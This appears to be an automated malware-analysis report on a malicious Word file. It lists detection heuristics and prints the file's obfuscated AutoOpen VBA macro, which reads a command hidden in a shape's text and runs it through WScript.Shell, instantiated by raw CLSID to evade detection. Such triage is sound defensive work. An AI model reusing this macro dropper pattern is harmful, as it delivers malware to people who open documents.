MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Sagent-6775322-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6775322-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6494 bytes |
SHA-256: e28e2cbeb27a98feb9859e2908736c37d08d8cc1e083887370a79fb577df8173 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
113 of 171 identifiers look randomly generated (e.g. 'FGqHUTvRsPz') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OLDYozqhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case TLFabb
Case 75952162
wGUAqcL = 101978796
swaCUXEsP = CLng(70823143)
Case 210240416
QzzpFa = Oct(XIAFk)
GjEPRDw = dEZFQw
Case 260231923
hMRfK = CDate(JXLlCDrn)
qqbOrAdwH = Int(219722989 * ntXjocUXa)
End Select
On Error Resume Next
Select Case mtdstQqAP
Case 223505509
JbXBowzWw = 328667611
nJmvUMfw = CLng(141356546)
Case 325712532
jdIJiC = Oct(dYmDTZ)
sMhijKG = HGUGzviVR
Case 82148964
quttfRuKS = CDate(tkpMSbA)
PonMlWCpY = Int(32095438 * zDUqWj)
End Select
On Error Resume Next
Select Case wVsOmaFRl
Case 48188819
iSPDhfC = 236867178
SvXQWZpwc = CLng(292713704)
Case 69117667
HIXNw = Oct(OzCpJ)
VEkZrYZOE = cCzcrNlH
Case 268579917
wbWKsqkVn = CDate(qclavSpQ)
ESwwX = Int(211390240 * QUSBNuA)
End Select
On Error Resume Next
Select Case oUzsXXWa
Case 201888941
ChHhb = 235959991
LDcJhid = CLng(318128037)
Case 191194007
iwDLovjK = Oct(ziLzq)
XiIFLmw = fbUVXHpW
Case 314333917
qsiavOmYW = CDate(mszGmj)
AUqRt = Int(210496069 * YkTZMD)
End Select
Set mQGwwwi = Shapes("FGqHUTvRsPz")
On Error Resume Next
Select Case YhnIlju
Case 154493756
GbzcjjsOu = 57201732
XchzTKvQ = CLng(18519746)
Case 275046013
qMZnYvq = Oct(wTuZR)
jYkFP = wNXFvznpa
Case 260071446
UKklkDw = CDate(zXsKP)
DQznlLK = Int(258974659 * ZdoUrZIBb)
End Select
On Error Resume Next
Select Case dTfDmlK
Case 251066811
tIifZ = 180354342
wpMJBY = CLng(195305219)
Case 264557124
hYLmaEqvc = Oct(NfDzaA)
jpjvzWm = zwtnYE
Case 275141080
EFMzzcoSm = CDate(JNjvr)
IcsoHDhC = Int(161325217 * dFwIDL)
End Select
On Error Resume Next
Select Case jXsEWIzm
Case 237385527
dzmEiX = 28130040
IJYFGMioi = CLng(97357933)
Case 282358116
rWViP = Oct(LjNZr)
mzsijVw = vqJqOd
Case 111873490
ZhZlvfXG = CDate(IofMUlj)
uSIUwE = Int(83583929 * WJBNiQ)
End Select
XkDQYilRPQk = "" + BkAXK + sNBYDAOI + YlBGHi + wiVizzq + mQGwwwi.TextFrame.TextRange.Text + zZHEoosv + zjcwpdHz + wUDaq
On Error Resume Next
Select Case JMsiizo
Case 225496359
OdESOAFc = 80525277
dnqsozwJL = CLng(336514378)
Case 290095936
ucUKdFw = Oct(jZBoknjG)
pRPvO = pTUEilqc
Case 231324335
rjcwEWAfY = CDate(DmBHBQ)
GWhcbjpfr = Int(59972209 * NCqwS)
End Select
On Error Resume Next
Select Case awwvHFp
Case 107266212
iAUplFTR = 3925843
ciNzFJMc = CLng(24898631)
Case 253895588
KbjpnQ = Oct(WPORD)
kzptWz = bEtiuMwsl
Case 307833355
ldRTZnz = CDate(oSulUKivN)
USGGq = Int(289185278 * hCvaS)
End Select
Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB)
On Error Resume Next
Select Case ZDjQpzlT
Case 152051075
qnKUo = 340307376
CohaOZjBX = CLng(90896460)
Case 275539008
pXUfRWsE = Oct(jiLto)
RvVprYWq = RMKiwOS
Case 251080101
hhiVHszwv = CDate(TGWhaoSGC)
wNThvOF = Int(76888518 * HoRwPM)
End Select
Const tvOQQT = 0
On Error Resume Next
Select Case RtrKUvpF
Case 84749594
UUJpKPIH = 280449576
hviWlwbMK = CLng(69447647)
Case 72734952
BbpbcWC = Oct(japwXqS)
QMOVpKA = KUYVUdv
Case 15301947
tThAjmm = CDate(TGHFm)
ujzwwvpkq = Int(178555471 * QHzjCG)
End Select
On Error Resume Next
Select Case lTqjZijiU
Case 308831022
vOuoqEE = 107465168
EBHtBRXnO = CLng(302972129)
Case 282825092
iatUila = Oct(lpAbSYBii)
KhREnkMz = IKsPaDF
Case 112847501
BTITdWNP = CDate(fbcQt)
fjJGa = Int(257717271 * IlGSj)
End Select
On Error Resume Next
Select Case FAXtVbqw
Case 12071376
zvOIvIQ = 186460771
bpFwGLzZ = CLng(190645609)
Case 92325504
CSGBp = Oct(KBsMaaJN)
lsddh = dwJuACQi
Case 139586392
NkBUi = CDate(MTGzOkZBO)
kGaHwzjPZ = Int(150018182 * HomtTWKMp)
End Select
On Error Resume Next
Select Case DaSJph
Case 194014339
RMkzDi = 291407103
WjIZH = CLng(221940141)
Case 272119102
jizon = Oct(lUiHJ)
ULBuizDq = zBNNBNiQ
Case 21103443
VkQZK = CDate(oaKbPQwU)
pLfNu = Int(49012701 * zVjcmbm)
End Select
iTowITPEz.Run! XkDQYilRPQk, tvOQQT
On Error Resume Next
Select Case zmWzN
Case 14781048
iCfbfGT = 43728048
aYckSl = CLng(42966996)
Case 289403065
HFdtAU = Oct(DKqmRtXc)
HaSSA = UVUtKjYlL
Case 207905090
iFzvlCK = CDate(bwcTwjAzh)
LoZNOk = Int(57834529 * GKzfYiH)
End Select
On Error Resume Next
Select Case owiQhp
Case 175984007
TKcHfc = 172063891
oJqbPPmMK = CLng(31192175)
Case 213761031
TfJCziI = Oct(TwijHAH)
LYULqzS = CZzYLRFcJ
Case 457529
oBZIB = CDate(BasfKT)
IIBlkU = Int(236638552 * MQzZij)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.